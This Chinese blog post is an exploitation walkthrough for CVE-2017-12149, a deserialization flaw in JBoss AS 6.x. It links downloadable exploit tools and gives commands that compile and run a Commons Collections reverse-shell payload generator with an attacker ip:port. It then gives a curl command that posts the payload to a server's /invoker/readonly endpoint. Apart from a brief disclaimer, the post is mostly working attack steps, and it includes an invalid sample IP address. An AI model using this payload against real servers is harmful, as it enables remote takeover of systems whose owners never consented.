CVE-2017-12149 JBOOS AS 6.X 反序列化漏洞利用

检测目录: 

返回500 一般就是存在了。

下载工具:

http://scan.javasec.cn/java/JavaDeserH2HC.zip

使用方法:

javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java

 

java -cp .:commons-collections-3.2.1.jar  ReverseShellCommonsCollectionsHashMap ip:port //反弹shell的IP和端口

这个时候会生成一个ReverseShellCommonsCollectionsHashMap.ser文件,curl 这个二进制文件就可以了。

ReverseShellCommonsCollectionsHashMap.ser 打包到http://scan.javasec.cn/java/ReverseShellCommonsCollectionsHashMap.ser

curl http://192.268.197.25:8080/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser

监听:

发送payload:

服务器log:

反弹结果:

工具:

下载地址:http://scan.javasec.cn/java/jboss_CVE-2017-12149.zip   (使用本工具仅供安全从业人人员测试验证、使用请遵守中华人民共和国网络安全法)

 

done.

 

posted @   sevck  阅读(9340)  评论(6编辑  收藏  举报
编辑推荐:
· 智能桌面机器人:用.NET IoT库控制舵机并多方法播放表情
· Linux glibc自带哈希表的用例及性能测试
· 深入理解 Mybatis 分库分表执行原理
· 如何打造一个高并发系统?
· .NET Core GC压缩(compact_phase)底层原理浅谈
阅读排行:
· 新年开篇:在本地部署DeepSeek大模型实现联网增强的AI应用
· DeepSeek火爆全网,官网宕机?本地部署一个随便玩「LLM探索」
· Janus Pro:DeepSeek 开源革新,多模态 AI 的未来
· 上周热点回顾(1.20-1.26)
· 【译】.NET 升级助手现在支持升级到集中式包管理
历史上的今天:
2015-11-21 FPM的远程利用
点击右上角即可分享
微信分享提示